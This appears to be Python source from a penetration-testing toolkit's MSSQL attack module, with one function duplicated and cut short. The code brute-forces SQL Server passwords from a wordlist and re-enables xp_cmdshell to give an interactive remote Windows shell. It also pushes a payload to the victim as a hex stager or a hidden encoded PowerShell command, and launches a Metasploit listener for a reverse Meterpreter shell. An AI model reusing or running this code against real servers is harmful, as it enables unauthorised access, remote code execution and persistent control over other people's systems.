def cmdshell(ipaddr, port, username, password, option): # connect to SQL server mssql = tds.MSSQL(ipaddr, int(port)) mssql.connect() mssql.login("master", username, password) print_status("Connection established with SQL Server...") print_status("Attempting to re-enable xp_cmdshell if disabled...") try: mssql.sql_query( "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;") except Exception as e: pass print_status( "Enter your Windows Shell commands in the xp_cmdshell - prompt...") while 1: # prompt mssql cmd = input("mssql>") # if we want to exit if cmd == "quit" or cmd == "exit": break # if the command isnt empty if cmd != "": # execute the command mssql.sql_query("exec master..xp_cmdshell '%s'" % (cmd)) # print the rest of the data mssql.printReplies() mssql.colMeta[0]['TypeData'] = 80 * 2 mssql.printRows()
def brute(ipaddr, username, port, wordlist): # if ipaddr being passed is invalid if ipaddr == "": return False if ipaddr != "": # base counter for successful brute force counter = 0 # build in quick wordlist if wordlist == "default": wordlist = "src/fasttrack/wordlist.txt" # read in the file password = file(wordlist, "r") for passwords in password: passwords = passwords.rstrip() # try actual password try: ipaddr = str(ipaddr) print "Attempting to brute force " + bcolors.BOLD + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC # connect to the sql server and attempt a password if ":" in ipaddr: #target_server = _mssql.connect(ipaddr, username, passwords) ipaddr = ipaddr.split(":") port = ipaddr[1] ipaddr = ipaddr[0] #target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords) sql_server = tds.MSSQL(str(ipaddr), int(port)) # print that we were successful sql_server.connect() #target_server = False target_server = sql_server.login("master", username, passwords) if target_server: print_status( "\nSuccessful login with username %s and password: %s" % (username, passwords)) counter = 1 break # if login failed or unavailable server except Exception, e: pass # if we brute forced a machine if counter == 1: if ":" in ipaddr: ipaddr = ipaddr.split(":") ipaddr = ipaddr[0] return ipaddr + "," + username + "," + str(port) + "," + passwords # else we didnt and we need to return a false else: if ipaddr != '': print_warning( "Unable to guess the SQL password for %s with username of %s" % (ipaddr, username)) return False
def cmdshell(ipaddr, port, username, password, option): # connect to SQL server mssql = tds.MSSQL(ipaddr, int(port)) mssql.connect() mssql.login("master", username, password) print_status("Connection established with SQL Server...") print_status("Attempting to re-enable xp_cmdshell if disabled...") try: mssql.sql_query( "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" ) except Exception, e: pass
def deploy_hex2binary(ipaddr, port, username, password): mssql = tds.MSSQL(ipaddr, int(port)) mssql.connect() mssql.login("master", username, password) print_status("Enabling the xp_cmdshell stored procedure...") try: mssql.sql_query( "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" ) except: pass print_status("Checking if powershell is installed on the system...") # just throw a simple command via powershell to get the output mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'") bundle = str(capture(mssql.printRows)) # remove null byte terminators from capture output bundle = bundle.replace("\\x00", "") # search for parameter version - standard output for powershell -Version command match = re.search("parameter version", bundle) # if we have a match we have powershell installed if match: print_status("Powershell was detected on the remote system.") option_ps = raw_input( "Do you want to use powershell injection? [yes/no]:") if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes": option = "1" print_status("Powershell delivery selected. Boom!") else: option = "2" # otherwise, fall back to the older version using debug conversion via hex else: print_status( "Powershell not detected, attempting Windows debug method.") option = "2" # if we don't have powershell if option == "2": try: reload(src.core.payloadgen.create_payloads) except: import src.core.payloadgen.create_payloads print_status("Connection established with SQL Server...") print_status("Converting payload to hexadecimal...") # if we are using a SET interactive shell payload then we need to make the path under web_clone versus ~./set if os.path.isfile(setdir + "/set.payload"): web_path = (setdir + "/web_clone/") # then we are using metasploit if not os.path.isfile(setdir + "/set.payload"): if operating_system == "posix": web_path = (setdir) # if it isn't there yet if not os.path.isfile(setdir + "/1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (setdir, setdir), shell=True).wait() subprocess.Popen( "cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() subprocess.Popen( "cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() fileopen = file("%s/1msf.exe" % (web_path), "rb") # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file filewrite = file(setdir + "/payload.hex", "w") filewrite.write(data) filewrite.close() # if we are using metasploit, start the listener if not os.path.isfile(setdir + "/set.payload"): if operating_system == "posix": try: reload(pexpect) except: import pexpect print_status("Starting the Metasploit listener...") msf_path = meta_path() child2 = pexpect.spawn("%s/msfconsole -r %s/meta_config" % (msf_path, setdir)) # random executable name random_exe = generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": print_status( "Using universal powershell x86 process downgrade attack..") payload = "x86" # specify ipaddress of reverse listener ipaddr = grab_ipaddress() update_options("IPADDR=" + ipaddr) port = raw_input( setprompt(["29"], "Enter the port for the reverse [443]")) if port == "": port = "443" update_options("PORT=" + port) update_options("POWERSHELL_SOLO=ON") print_status( "Prepping the payload for delivery and injecting alphanumeric shellcode..." ) filewrite = file(setdir + "/payload_options.shellcode", "w") # format needed for shellcode generation filewrite.write("windows/meterpreter/reverse_tcp" + " " + port + ",") filewrite.close() try: reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # create the directory if it does not exist if not os.path.isdir(setdir + "/reports/powershell"): os.makedirs(setdir + "/reports/powershell") x86 = file(setdir + "/x86.powershell", "r") x86 = x86.read() x86 = "powershell -nop -win hidden -noni -enc " + x86 print_status( "If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) filewrite = file( setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) filewrite.close() # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt" filewrite = file(setdir + "/reports/powershell/powershell.rc", "w") filewrite.write( "use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port)) filewrite.close() # grab the metasploit path from config or smart detection msf_path = meta_path() if operating_system == "posix": try: reload(pexpect) except: import pexpect print_status("Starting the Metasploit listener...") child2 = pexpect.spawn( "%s/msfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir)) print_status( "Waiting for the listener to start first before we continue forward..." ) print_status( "Be patient, Metaploit takes a little bit to start...") child2.expect("Starting the payload handler", timeout=30000) print_status( "Metasploit started... Waiting a couple more seconds for listener to activate.." ) time.sleep(5) # assign random_exe command to the powershell command random_exe = powershell_command # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": # we selected hex to binary fileopen = file("src/payloads/hex2binary.payload", "r") # specify random filename for deployment print_status("Deploying initial debug stager to the system.") random_file = generate_random_string(10, 15) for line in fileopen: # remove bogus chars line = line.rstrip() # make it printer friendly to screen print_line = line.replace("echo e", "") print_status("Deploying stager payload (hex): " + bcolors.BOLD + str(print_line) + bcolors.ENDC) mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" % (line, random_file)) print_status("Converting the stager to a binary...") # here we convert it to a binary mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file)) print_status("Conversion complete. Cleaning up...") # delete the random file mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file)) # here we start the conversion and execute the payload print_status( "Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time fileopen = file(setdir + "/payload.hex", "r") while fileopen: data = fileopen.read(900).rstrip() # if data is done then break out of loop because file is over if data == "": break print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n") mssql.sql_query("exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe)) print_status( "Delivery complete. Converting hex back to binary format.") mssql.sql_query("exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file)) mssql.sql_query("exec master..xp_cmdshell '%s %s'" % (random_file, random_exe)) # clean up the old files print_status("Cleaning up old files..") mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe)) # if we are using SET payload if os.path.isfile(setdir + "/set.payload"): print_status("Spawning seperate child process for listener...") try: shutil.copyfile(setdir + "/web_clone/x", definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options if check_options("PORT=") != 0: port = check_options("PORT=") # if for some reason the port didnt get created we default to 443 else: port = "443" # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified try: reload(thread) except: import thread # execute the payload # we append more commands if option 1 is used if option == "1": print_status("Triggering the powershell injection payload... ") sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command)) #mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command)) thread.start_new_thread(mssql.sql_query, (sql_command, )) # using the old method if option == "2": print_status("Triggering payload stager...") sql_command = ("xp_cmdshell '%s'" % (random_exe)) # start thread of SQL command that executes payload thread.start_new_thread(mssql.sql_query, (sql_command, )) time.sleep(1) # if pexpect doesnt exit right then it freaks out if os.path.isfile(setdir + "/set.payload"): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass